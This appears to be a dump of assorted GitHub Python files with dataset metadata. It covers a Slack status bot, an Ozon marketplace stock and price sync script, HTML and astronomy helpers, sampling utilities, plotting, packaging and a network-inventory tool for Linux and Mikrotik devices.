batch_size=16)\n\n acc = model.evaluate(pad_x, labels)[1]\n print('acc:', acc)\n# acc: 1.0","repo_name":"estela-park/AI_BitCamp","sub_path":"Keras_Modelling/keras52_1_Embedding.py","file_name":"keras52_1_Embedding.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31421997407","text":"from slackclient import SlackClient\nimport time\nimport feedparser as fp\nimport os\nimport string\n\nslack_token = os.environ[\"SLACK_BOT_TOKEN\"]\nsc = SlackClient(slack_token)\n\nupdates = open('updates.txt', 'r+')\nupdates.seek(40)\nguru_date = updates.read(19)\nupdates.seek(0)\n\n#Get updates from Guru\n\nd = fp.parse('http://status.getguru.com/history.rss')\nguru_text = str(d.entries[0])\nlatest_date = time.strftime('%Y-%m-%d %H:%M:%S', d.entries[0].published_parsed)\n#parse text\nguru_text = guru_text.split(\"

\")[1]\nguru_text = string.replace(guru_text, '', '')\nguru_text = string.replace(guru_text, '
', ' - ')\nguru_text = string.replace(guru_text, '', '*')\nguru_text = string.replace(guru_text, '', '*')\nguru_text = string.replace(guru_text, '

', '')\n#check if update is new\nif latest_date != guru_date:\n\t#post to slack\n\tsc.api_call(\n \t\"chat.postMessage\",\n \tchannel=\"#chat\",\n \ttext=(\"*Guru Status Update:* \" + guru_text)\n\t)\n\t#add date to updates.txt\n\tupdates.seek(40)\n\tupdates.write(latest_date)\n\nupdates.close()","repo_name":"ryandunlavy/service-status-updater","sub_path":"guru_status.py","file_name":"guru_status.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16146181502","text":"import io\nimport logging.config\nimport os\nimport re\nimport zipfile\nfrom environs import Env\n\nimport pandas as pd\nimport requests\n\nlogger = logging.getLogger(__file__)\n\n\ndef get_product_list(last_id, client_id, seller_token):\n \"\"\"Получить список товаров магазина озон.\n\n Делает API-запрос на сайт озон для получения списка товаров. Для корректного запроса необходим идентификатор клиента и идентификатор продавца.\n Фильтр настроен на отображения всех товаров с лимитом 1000.\n\n Аргументы:\n last_id (str): Последний идентификатор.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n list: Список с информацией о товарах в каталоге\n\n Пример корректного исполнения функции:\n Корректный ответ от сайта озон - 200 и получение ответа в json формате\n\n Пример некорректного исполнения функции:\n Корректный ответ от сайта озон - 400\n\n \"\"\"\n url = \"https://api-seller.ozon.ru/v2/product/list\"\n headers = {\n \"Client-Id\": client_id,\n \"Api-Key\": seller_token,\n }\n payload = {\n \"filter\": {\n \"visibility\": \"ALL\",\n },\n \"last_id\": last_id,\n \"limit\": 1000,\n }\n response = requests.post(url, json=payload, headers=headers)\n response.raise_for_status()\n response_object = response.json()\n return response_object.get(\"result\")\n\n\ndef get_offer_ids(client_id, seller_token):\n \"\"\"Получить артикулы товаров магазина озон.\n\n Формерует список с информацией о товарах в каталоге и добавляет к нему артикул\n\n Аргументы:\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значе��ие:\n Список предложений\n\n Пример корректного исполнения функции:\n Не пустой список предложений\n\n Пример некорректного исполнения функции:\n Пустой список предложений\n\n \"\"\"\n last_id = \"\"\n product_list = []\n while True:\n some_prod = get_product_list(last_id, client_id, seller_token)\n product_list.extend(some_prod.get(\"items\"))\n total = some_prod.get(\"total\")\n last_id = some_prod.get(\"last_id\")\n if total == len(product_list):\n break\n offer_ids = []\n for product in product_list:\n offer_ids.append(product.get(\"offer_id\"))\n return offer_ids\n\n\ndef update_price(prices: list, client_id, seller_token):\n \"\"\"Обновить цены товаров.\n\n Делает API-запрос на сайт озон. Для корректного запроса необходим идентификатор клиента, идентификатор продавца,\n список с ценами\n\n Аргументы:\n prices (list): Список с ценами.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Ответ от сайта в json формате\n\n Пример корректного исполнения функции:\n Корректный ответ от сайта озон - 200 и получение ответа в json формате\n\n Пример некорректного исполнения функции:\n Корректный ответ от сайта озон - 400\n\n \"\"\"\n url = \"https://api-seller.ozon.ru/v1/product/import/prices\"\n headers = {\n \"Client-Id\": client_id,\n \"Api-Key\": seller_token,\n }\n payload = {\"prices\": prices}\n response = requests.post(url, json=payload, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef update_stocks(stocks: list, client_id, seller_token):\n \"\"\"Обновить остатки.\n\n Делает API-запрос на сайт озон. Для корректного запроса необходим идентификатор клиента,\n идентификатор продавца и список с остатками.\n\n Аргументы:\n stocks (list): Список с остатками.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Ответ от сайта в json формате\n\n Пример корректного исполнения функции:\n Корректный ответ от сайта озон - 200 и получение ответа в json формате\n\n Пример некорректного исполнения функции:\n Корректный ответ от сайта озон - 400\n\n \"\"\"\n url = \"https://api-seller.ozon.ru/v1/product/import/stocks\"\n headers = {\n \"Client-Id\": client_id,\n \"Api-Key\": seller_token,\n }\n payload = {\"stocks\": stocks}\n response = requests.post(url, json=payload, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef download_stock():\n \"\"\"Скачать файл ostatki с сайта casio.\n\n Скачивает и распаковывает архив с сайта casio. Остатки хранятся в таблице формата .xls.\n Из файла берет столбец с остатками товара и записывает в словарь.\n После всего удаляет файл, скаченный ранее с сайта\n\n Возвращаемое значение:\n Словарь с остатками товара\n\n Пример корректного исполнения функции:\n Заполненный словарь\n\n Пример некорректного исполнения функции:\n Пустой словарь\n\n \"\"\"\n # Скачать остатки с сайта\n casio_url = \"https://timeworld.ru/upload/files/ostatki.zip\"\n session = requests.Session()\n response = session.get(casio_url)\n response.raise_for_status()\n with response, zipfile.ZipFile(io.BytesIO(response.content)) as archive:\n archive.extractall(\".\")\n # Создаем список остатков часов:\n excel_file = \"ostatki.xls\"\n watch_remnants = pd.read_excel(\n io=excel_file,\n na_values=None,\n keep_default_na=False,\n header=17,\n ).to_dict(orient=\"records\")\n os.remove(\"./ostatki.xls\") # Удалит�� файл\n return watch_remnants\n\n\ndef create_stocks(watch_remnants, offer_ids):\n \"\"\"Создать запасы.\n\n Создает пустой список для записи запасов.\n В цикле по остаткам, которые вернула функция download_stock() с сайта Casio, проверяются,\n если количество товара больше 10 то запас 100,\n если количество товара 1 то запаса нет. Иначе запас равен количеству товара.\n В зависимости от условий список запасов пополняется артикулом и количеством товара.\n Также в цикле по предложениям в список запасов добавляется предложение без запаса.\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n offer_ids (list): Список товаров магазина.\n\n Возвращаемое значение:\n Список с запасами товара\n\n Пример корректного исполнения функции:\n Заполненный список\n\n Пример некорректного исполнения функции:\n Пустой список\n\n \"\"\"\n # Уберем то, что не загружено в seller\n stocks = []\n for watch in watch_remnants:\n if str(watch.get(\"Код\")) in offer_ids:\n count = str(watch.get(\"Количество\"))\n if count == \">10\":\n stock = 100\n elif count == \"1\":\n stock = 0\n else:\n stock = int(watch.get(\"Количество\"))\n stocks.append({\"offer_id\": str(watch.get(\"Код\")), \"stock\": stock})\n offer_ids.remove(str(watch.get(\"Код\")))\n # Добавим недостающее из загруженного:\n for offer_id in offer_ids:\n stocks.append({\"offer_id\": offer_id, \"stock\": 0})\n return stocks\n\n\ndef create_prices(watch_remnants, offer_ids):\n \"\"\"Создать цену.\n\n Создает пустой список для записи цены.\n В цикле по остаткам, которые вернула функция download_stock().\n Цена будет установлена в том случае, если в списке предложений найдется код товара из списка остатков.\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n offer_ids (list): Список товаров магазина.\n\n Возвращаемое значение:\n Список с ценами товара\n\n Пример корректного исполнения функции:\n Заполненный список\n\n Пример некорректного исполнения функции:\n Пустой список\n\n \"\"\"\n prices = []\n for watch in watch_remnants:\n if str(watch.get(\"Код\")) in offer_ids:\n price = {\n \"auto_action_enabled\": \"UNKNOWN\",\n \"currency_code\": \"RUB\",\n \"offer_id\": str(watch.get(\"Код\")),\n \"old_price\": \"0\",\n \"price\": price_conversion(watch.get(\"Цена\")),\n }\n prices.append(price)\n return prices\n\n\ndef price_conversion(price: str) -> str:\n \"\"\"Преобразовать цену.\n\n Отрезает от строки с ценой дробную часть и оставляет в целой части только цифры.\n\n Аргументы:\n price (str): Цена.\n\n Возвращаемое значение:\n Строка целой части числа без лишних знаков и валюты.\n\n Пример корректного исполнения функции:\n 5'990.00 руб. -> 5990\n\n Пример некорректного исполнения функции:\n 2'530.00 руб. -> .00 руб\n\n \"\"\"\n\n return re.sub(\"[^0-9]\", \"\", price.split(\".\")[0])\n\n\ndef divide(lst: list, n: int):\n \"\"\"Разделить список lst на части по n элементов.\n\n Отрезает от строки с ценой дробную часть и оставляет в целой части только цифры.\n\n Аргументы:\n lst (list): Список, который необходимо разделить.\n n (int): с каким шагом необходимо разделить.\n\n Возвращаемое значение:\n Сп��сок разделенный на части с установленным шагом.\n\n Пример корректного исполнения функции:\n Список разделен на части с установленным шагом\n\n Пример некорректного исполнения функции:\n Список разделен на части с не установленным шагом или пуст\n\n \"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\nasync def upload_prices(watch_remnants, client_id, seller_token):\n \"\"\"Обновить цену.\n\n Получает от функции get_offer_ids() список товара.\n Получает от функции create_prices() список с ценами товара.\n Разделяет в цикле цену с шагом 1000 и получает от функции update_price() ответ в json формате\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Обновленный список с ценами\n\n Пример корректного исполнения функции:\n В списке обновились цены на товар\n\n Пример некорректного исполнения функции:\n В списке старые цены на товар\n\n \"\"\"\n offer_ids = get_offer_ids(client_id, seller_token)\n prices = create_prices(watch_remnants, offer_ids)\n for some_price in list(divide(prices, 1000)):\n update_price(some_price, client_id, seller_token)\n return prices\n\n\nasync def upload_stocks(watch_remnants, client_id, seller_token):\n \"\"\"Обновить остатки.\n\n Получает от функции get_offer_ids() список товара.\n Получает от функции create_stocks() список с остатками товара.\n Разделяет в цикле цену с шагом 100 и получает от функции update_price() ответ в json формате\n\n Аргументы:\n watch_remnants (dict): Словарь с остатками.\n client_id (str): Идентификатор клиента.\n seller_token (str): Идентификатор продавца.\n\n Возвращаемое значение:\n Обновленный список с остатками товара и список товара на который есть запас\n\n Пример корректного исполнения функции:\n В списке обновились остатки товара\n\n Пример некорректного исполнения функции:\n В списке ничего не изменилось\n\n \"\"\"\n offer_ids = get_offer_ids(client_id, seller_token)\n stocks = create_stocks(watch_remnants, offer_ids)\n for some_stock in list(divide(stocks, 100)):\n update_stocks(some_stock, client_id, seller_token)\n not_empty = list(filter(lambda stock: (stock.get(\"stock\") != 0), stocks))\n return not_empty, stocks\n\n\ndef main():\n env = Env()\n seller_token = env.str(\"SELLER_TOKEN\")\n client_id = env.str(\"CLIENT_ID\")\n try:\n offer_ids = get_offer_ids(client_id, seller_token)\n watch_remnants = download_stock()\n # Обновить остатки\n stocks = create_stocks(watch_remnants, offer_ids)\n for some_stock in list(divide(stocks, 100)):\n update_stocks(some_stock, client_id, seller_token)\n # Поменять цены\n prices = create_prices(watch_remnants, offer_ids)\n for some_price in list(divide(prices, 900)):\n update_price(some_price, client_id, seller_token)\n except requests.exceptions.ReadTimeout:\n print(\"Превышено время ожидания...\")\n except requests.exceptions.ConnectionError as error:\n print(error, \"Ошибка соединения\")\n except Exception as error:\n print(error, \"ERROR_2\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"morozgit/seller-apis","sub_path":"seller.py","file_name":"seller.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"20056354665","text":"nterms = int(input(\"terms?\"))\nn1,n2 = 0,1\ncount = 0\nif nterms <=0:\n print(\"don't be a larry [:)\")\nelif nterms == 1:\n print (n1)\nelse:\n while count < nterms:\n print(n1)\n nth = (n1 + n2)/0\n n1 = n2\n n2 = nth\n count += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"InstructorNigel/hello","sub_path":"whatever 10.py","file_name":"whatever 10.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25486948262","text":"\"\"\"\nThis started from a copy of FHTML.py from Fernanda Ostrovski in June 2016\nIt is based on a version of HTML from Sophie Reed. The current version\nof HTML.py from Sophie has a creation date of 20150116\n\n\nWe might want to explore the use of:\n\n https://pypi.python.org/pypi/html\n\n or pandas html i/o or astropy html i/o\n\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\n\n\ndef table(term_list, header_list, nan=None,\n links=(False, 0, [])):\n \"\"\"\n create a html table\n\n Needs a way to define how to deal with NANs so they can be sorted.\n\n \"\"\"\n\n debug = False\n\n print(\"running function:\", __name__)\n print('type(term_list)', type(term_list))\n print('type(term_list[0])', type(term_list[0]))\n print('type(term_list[0][0])', type(term_list[0][0]))\n print('Number of rows:', len(term_list))\n print('type(header_list)', type(header_list))\n print('type(header_list[0])', type(header_list[0]))\n print('Number of column fields:', len(header_list))\n\n lines = \"\"\n\n # rgm added anchor support \n # where anchor is the row number ID as a string\n # a url of the form base_url#ID then takes you to the row you want.\n\n irow = -1\n for term in term_list:\n\n irow = irow + 1\n n = 0\n p = term_list.index(term)\n\n while n < len(term):\n\n # print('type(term[n])', type(term[n]))\n\n if term[n].find('nan') >= 0:\n if debug:\n print(\"Found a 'nan':\", n, term[n])\n print(\"Found a 'nan':\", term)\n if nan is not None:\n term[n] = '-99'\n\n if (links[0] is True) and (links[1] == n):\n file = str(links[2][p]) + \".html\"\n st = link(file, str(term[n]))\n\n else:\n st = str(term[n])\n\n if n == 0:\n line = \"\" + '' \\\n + str(p + 1) + '' + \\\n '' + \\\n \"\" + st + \"\"\n elif n == len(term) - 1:\n line += \"\" + st + \"\\n\"\n else:\n line += \"\" + st + \"\"\n\n n += 1\n\n lines += line\n\n heads = \"\"\n n = 0\n while n < len(header_list):\n head = header_list[n]\n if n == 0:\n heads += '\\n' \\\n + '\\n' \\\n + '\"\n elif n == len(header_list) - 1:\n heads += \"\\n\\n\"\n else:\n heads += \"\"\n\n n += 1\n\n lines = heads + lines + \"\\n\\n
ID ' \\\n + head + \"\" + head + \"
\" + head + \"
\"\n\n if len(term_list) == 0:\n print(\"No values to turn into table\")\n return\n else:\n return lines\n\n\ndef image(im_file):\n \"\"\"\n create image link\n \"\"\"\n\n im_line = \"\"\n return im_line\n\n\ndef link(link_add, link_text):\n \"\"\"\n create link\n \"\"\"\n link_line = \"\" + link_text + \"\"\n return link_line\n\n\ndef cutout_page(link_path, link_add, cutout_files, info, RA_main):\n \"\"\"\n create cutout page\n \"\"\"\n f = open(link_path + link_add, \"w\")\n lines = \"\"\n\n for (i, j) in info:\n if i == RA_main:\n l = info.index((i, j))\n line = str(i) + \": \" + str(j) + \"
\"\n lines += line\n\n lines += wise_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += ned_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += sdss_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += dr9_url(info[l][1], info[l + 1][1]) + \"
\"\n lines += dr12_url(info[l][1], info[l + 1][1]) + \"
\"\n for cutout_file in cutout_files:\n print(cutout_file)\n lines += \"
\" + \"
\" + str(cutout_file) + \"
\" \\\n + image(cutout_file) + \"
\" + \"

\"\n\n f.write(lines)\n f.close()\n\n\ndef wise_url(RA, DEC):\n \"\"\"\n create WISE IRSA link\n \"\"\"\n if isinstance(RA, np.float):\n RA = \"%.5f\" % RA\n DEC = \"%.5f\" % DEC\n\n line = '' \\\n + 'WISE'\n\n return line\n\n\ndef ned_url(RA, DEC):\n \"\"\"\n create NED link from string or floating point RA, Dec\n\n \"\"\"\n if isinstance(RA, np.float):\n RA = \"%.5f\" % RA\n DEC = \"%.5f\" % DEC\n\n # line = 'NED Link'\n\n # change RA, DEC to str(RA), str(DEC)\n line = 'NED Link'\n\n return line\n\n\ndef sdss_url(RA, DEC):\n \"\"\"\n create SDSS DR7 cas/skyserver explore link\n \"\"\"\n line = 'SDSS Skyserver Link'\n\n return line\n\n\ndef dr9_url(RA, DEC):\n \"\"\"\n create SDSS skyserver DR9 navigate link\n \"\"\"\n line = 'SDSS DR9 Navigate Tool Link'\n\n return line\n\n\ndef dr12_url(RA, DEC):\n \"\"\"\n create SDSS skyserver DR12 navigate link\n \"\"\"\n line = 'SDSS DR12 Navigate Tool Link'\n\n return line\n\n\nif __name__ == \"__main__\":\n\n help(__name__)\n","repo_name":"richardgmcmahon/librgm","sub_path":"html/mk_html.py","file_name":"mk_html.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"73244972793","text":"import csv\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef makeCelsium(fahrenheit):\r\n return (fahrenheit - 32) * 5 / 9\r\n\r\n\r\nfilename = 'data/sitka_weather_07-2018_simple.csv'\r\nwith open(filename) as file:\r\n reader = csv.reader(file)\r\n header_row = next(reader)\r\n\r\n # Чтение максимальных температур\r\n highs = []\r\n for row in reader:\r\n high = int(row[5])\r\n highs.append(makeCelsium(high))\r\n\r\n# Нанесение данных на диаграмму\r\nplt.style.use('seaborn')\r\nfig, ax = plt.subplots()\r\nax.plot(highs, c='red')\r\n\r\n# Форматирование диаграммы\r\nplt.title(\"Daily High temperatures, July 2018\", fontsize=24)\r\nplt.xlabel('', fontsize=16)\r\nplt.ylabel(\"Temperature (C)\", fontsize=16)\r\nplt.tick_params(axis='both', which='major', labelsize=16)\r\n\r\nplt.show()","repo_name":"koted0/Data-Visualization","sub_path":"sitka_highs.py","file_name":"sitka_highs.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21330333363","text":"from setuptools import setup\nimport os\n\n\ncurrent = os.path.abspath(os.path.dirname(__file__))\nos.chdir(current)\n\nabout = {}\nwith open(os.path.join(current, 'ansible', '__init__.py'), 'r') as f:\n exec(f.read(), about)\n\nwith open('README.md', 'r') as f:\n readme = f.read()\n\nwith open('requirements.txt') as fh:\n required = [x for x in fh.read().splitlines() if not x.startswith('#')]\n\nsetup(\n name=about['__title__'],\n version=about['__version__'],\n description=about['__description__'],\n long_description=readme,\n long_description_content_type='text/markdown',\n packages=['ansible.module_utils.network.radware', 'ansible.modules.network.radware'],\n install_requires=required,\n url=about['__url__'],\n keywords=['radware', 'ansible', 'alteon', 'common'],\n license=about['__license__'],\n author=about['__author__'],\n author_email=about['__author_email__'],\n python_requires='~=3.6',\n data_files=[('.', ['requirements.txt'])],\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Developers'\n ]\n)\n\n","repo_name":"leonmeguira/automation-for-radware","sub_path":"ansible/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39145041204","text":"from random import sample\nfrom numpy import unique, random\nimport pandas as pd\nfrom pandas import cut\n\ndef balanced_sample_maker(X, y, random_seed=None):\n \"\"\" return a balanced data set by oversampling minority class\n current version is developed on assumption that the positive\n class is the minority.\n\n Parameters:\n ===========\n X: {numpy.ndarrray}\n y: {numpy.ndarray}\n \"\"\"\n uniq_levels = unique(y)\n uniq_counts = {level: sum(y == level) for level in uniq_levels}\n\n if not random_seed is None:\n random.seed(random_seed)\n\n # find observation index of each class levels\n groupby_levels = {}\n for ii, level in enumerate(uniq_levels):\n obs_idx = [idx for idx, val in enumerate(y) if val == level]\n groupby_levels[level] = obs_idx\n\n # oversampling on observations of positive label\n sample_size = uniq_counts[0]\n over_sample_idx = random.choice(groupby_levels[1], size=sample_size, replace=True).tolist()\n balanced_copy_idx = groupby_levels[0] + over_sample_idx\n random.shuffle(balanced_copy_idx)\n\n return X[balanced_copy_idx, :], y[balanced_copy_idx]\n \n \ndef stratified_sample_maker(x, size, k=10, is_return_index=False):\n \"\"\" binning continuous variable and conduct stratified sampling\n \n Parameters:\n ==========\n * x: {vector-like}\n * size: integer, size of samples\n * k: integer, the number of bins to cut continous variable \n * is_return_index: boolean, \n True, sampled instance's index in x\n False, returned sample instance index\n \"\"\"\n \n # detect if x is categorical variables \n inst_x = x[0]\n if isinstance(inst_x, (int, float)):\n if isinstance(inst_x, int):\n uniq_x = list(set(x))\n if len(uniq_x) < 0.2 * len(x):\n is_number = False\n else:\n is_number = True\n else:\n is_number = True\n else: \n is_number = False\n \n # bininig continuous variable\n if is_number:\n probs = np.linspace(0, 1, k+1, endpoint=True)\n cut_points = pd.Series(x).quantile(probs).tolist()\n cut_labels = [i for i in range(k)]\n x_bins = cut(x, bins=cut_points, labels=cut_labels)\n else:\n cut_labels = list(set(x))\n x_bins = x\n \n # calcualte the observed probabilties\n vc_df = pd.Series(x_bins).value_counts()\n cut_labels = vc_df.index.tolist()\n obs_probs = (vc_df / sum(vc_df)).tolist()\n cum_size = 0\n cum_prob = 0\n\n sample_bin_size = []\n for ii, obs_prob in enumerate(obs_probs):\n if ii < len(cut_labels)-1:\n sb_size = round(size * obs_prob, 0)\n cum_size += sb_size\n cum_prob += obs_prob\n else:\n sb_size = size - cum_size\n cum_size += sb_size\n cum_prob += obs_prob\n sample_bin_size.append(int(sb_size))\n \n # generate samples\n sample_index = []\n for ii, (cut_label, bin_samp_size) in enumerate(zip(cut_labels, sample_bin_size)):\n pool = [i for i, xb in enumerate(x_bins) if xb == cut_label]\n samples = sample(pool, k=bin_samp_size)\n sample_index = sample_index + samples\n \n if is_return_index:\n return sample_index \n else:\n return [x[i] for i in sample_index]\n ","repo_name":"beingzy/ds_toolbox","sub_path":"ds_toolbox/Sampler.py","file_name":"Sampler.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33065530913","text":"def createH33Header(size,width,inputfilename,outputfilename):\n fid = open(outputfilename,'w');\n\n sizex=size[0]\n sizey=size[1]\n sizez=size[2]\n\n widthx=width[0]\n widthy=width[1]\n widthz=width[2]\n\n # Base\n\n base = '!INTERFILE :=\\n' + \\\n 'name of data file := %s\\n'+\\\n '!GENERAL DATA :=\\n'+\\\n '!GENERAL IMAGE DATA :=\\n'+\\\n '!type of data := PET\\n'+\\\n 'imagedata byte order := LITTLEENDIAN\\n'+\\\n '!PET STUDY (General) :=\\n'+\\\n '!PET data type := Image\\n'+\\\n 'process status := Reconstructed\\n'+\\\n '!number format := float\\n'+\\\n '!number of bytes per pixel := 4\\n'+\\\n 'number of dimensions := 3\\n'+\\\n 'matrix axis label [1] := x\\n'+\\\n '!matrix size [1] := %d\\n'+\\\n 'scaling factor (mm/pixel) [1] := %g\\n'+\\\n 'matrix axis label [2] := y\\n'+\\\n '!matrix size [2] := %d\\n'+\\\n 'scaling factor (mm/pixel) [2] := %g\\n'+\\\n 'matrix axis label [3] := z\\n'+\\\n '!matrix size [3] := %d\\n'+\\\n 'scaling factor (mm/pixel) [3] := %g\\n'+\\\n '!number of slices := %d\\n'+\\\n 'slice thickness (pixels) := %g\\n'+\\\n 'number of time frames := 1\\n'+\\\n '!END OF INTERFILE :=\\n'\n\n fid.write(base % (inputfilename,sizex,widthx,sizey,widthy,sizez,widthz,sizez,widthz));\n\n fid.close();\n return","repo_name":"NottingDuck/Project-UCL-ZHENYA_YAN","sub_path":"Code/Density_Image/CreateHeader.py","file_name":"CreateHeader.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7546076655","text":"#!/usr/bin/env python\n\n\"\"\" Modul obstarava pripojeni k jednotlivym typum zarizeni Linux, Mikrotik a vytvari Generic device\nz tech zarizeni ke kterym se neumi pripojit \"\"\"\n\nimport logging\nfrom multiprocessing.dummy import Pool\nimport tqdm\nimport scanobjects\nimport netobjects\nimport linux\nimport mikrotik\nfrom tools import save_object\n\n\n# Nastavi logovani\nLOGGER = logging.getLogger(__name__)\n\n\nclass Connect:\n \"\"\" Trida rozdeli podle typu zarizeni a provede nacteni jejich konfigurace \"\"\"\n\n def __init__(self, scan_net: scanobjects.ScanNetwork):\n self.scan_net = scan_net\n self.network = netobjects.Network(scan_net.net_name)\n self.linux_dev = list()\n self.mikrotik_dev = list()\n self.generic_dev = list()\n self.sort_devices()\n self.connect_mikrotik()\n self.connect_linux()\n self.get_generic_objects()\n\n def sort_devices(self):\n \"\"\" Rozdeli zarizeni podle typu \"\"\"\n\n for dev in self.scan_net.ip_objects_active:\n if dev.operating_system == 'Linux':\n self.linux_dev.append(dev)\n elif dev.operating_system == 'RouterOS':\n self.mikrotik_dev.append(dev)\n else:\n self.generic_dev.append(dev)\n\n def save_network(self):\n \"\"\" Ulozi objekt sit do souboru \"\"\"\n\n save_object(self.network, self.scan_net.net_name+'_network.pkl')\n\n def connect_linux(self):\n \"\"\" Nacte Linux zarizeni \"\"\"\n\n def connect(ip_obj: scanobjects.IpScan) -> linux.Linux:\n return linux.Linux(ip_obj, self.scan_net.accounts, self.network)\n\n hlp_list = list()\n pool = Pool(52) # Vytvori pool o danem poctu vlaken\n # Vytvori Linux objekty z daneho seznamu IpObjektu a zobrazi progress bar\n text = 'Analyzing Linux'\n for item in tqdm.tqdm(pool.imap_unordered(connect, self.linux_dev),\n total=len(self.linux_dev), desc=text, unit='device'):\n hlp_list.append(item)\n pool.close() # Udelame poradek\n pool.join()\n count = 0\n count_dupl = 0\n count_generic = 0\n for dev in hlp_list:\n if dev.device:\n # Pokud zarizeni uz nebylo nacteno, protoze ma vice IP tak ho oznaci jako duplikat\n if dev.device.uid not in self.network.get_uid_list():\n # Pridame zarizeni k nactenym zarizenim\n self.network.add_device(dev.device)\n count += 1\n # Pridame zarizeni do seznamu duplikatu\n else:\n self.network.add_duplicate_device(dev.device)\n count_dupl += 1\n # Pokud se nepodarilo pripojit, tak dame zarizeni do generic\n else:\n self.generic_dev.append(dev.ip_obj)\n count_generic += 1\n self.save_network()\n print('')\n print('Saved {} linux devices.'.format(count))\n print('{} linux devices was duplicate.'.format(count_dupl))\n print('{} linux devices was unconectable and moved to generic devices.'.format(\n count_generic))\n print('')\n\n def connect_mikrotik(self):\n \"\"\" Nacte Mikrotik zarizeni \"\"\"\n\n def connect(ip_obj: scanobjects.IpScan) -> mikrotik.Mikrotik:\n return mikrotik.Mikrotik(ip_obj, self.scan_net.accounts, self.network)\n\n hlp_list = list()\n pool = Pool(26) # Vytvori pool o danem poctu vlaken\n # Vytvori Linux objekty z daneho seznamu IpObjektu a zobrazi progress bar\n text = 'Analyzing Mikrotik'\n for item in tqdm.tqdm(pool.imap_unordered(connect, self.mikrotik_dev),\n total=len(self.mikrotik_dev), desc=text, unit='device'):\n hlp_list.append(item)\n pool.close() # Udelame poradek\n pool.join()\n count = 0\n count_dupl = 0\n count_generic = 0\n for dev in hlp_list:\n if dev.device:\n # Pokud zarizeni uz nebylo nacteno, protoze ma vice IP tak ho oznaci jako duplikat\n if dev.device.uid not in self.network.get_uid_list():\n # Pridame zarizeni k nactenym zarizenim\n self.network.add_device(dev.device)\n count += 1\n # Pridame zarizeni do seznamu duplikatu\n else:\n self.network.add_duplicate_device(dev.device)\n count_dupl += 1\n # Pokud se nepodarilo pripojit, tak dame zarizeni do generic\n else:\n self.generic_dev.append(dev.ip_obj)\n count_generic += 1\n self.save_network()\n print('')\n print('Saved {} mikrotik devices.'.format(count))\n print('{} mikrotik devices was duplicate.'.format(count_dupl))\n print('{} mikrotik devices was unconectable and moved to generic devices.'.format(\n count_generic))\n print('')\n\n def get_generic_objects(self):\n \"\"\" Z IpObjektu ze kterych neumime dostat data udelame GenericDevice objekty \"\"\"\n\n for obj in tqdm.tqdm(self.generic_dev, total=len(self.generic_dev),\n desc='Adding devices', unit='device'):\n # for obj in self.generic_dev:\n dev_obj = netobjects.GenericDevice()\n dev_obj.ipaddr = obj.ipaddr\n dev_obj.operating_system = obj.operating_system\n dev_obj.os_info = obj.os_info\n dev_obj.device = obj.device\n dev_obj.device_info = obj.device_info\n dev_obj.active = obj.active\n dev_obj.pingable = obj.pingable\n dev_obj.min = obj.min\n dev_obj.avg = obj.avg\n dev_obj.max = obj.max\n dev_obj.loss = obj.loss\n dev_obj.active_ports = obj.active_ports\n self.network.add_device(dev_obj)\n self.save_network()\n print('')\n print('Saved {} generic devices.'.format(len(self.generic_dev)))\n print('')\n","repo_name":"slesta/NetMon","sub_path":"connectobject.py","file_name":"connectobject.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"71677078392","text":"import toml\nimport json\nimport time\nimport os\n\ndirname = os.path.dirname(__file__)\nconfig_filename = os.path.join(dirname, 'config_remote.toml')\nconfig_data = toml.load(config_filename)\nbutton_map = config_data['button_map_kuka']\n\n\nclass 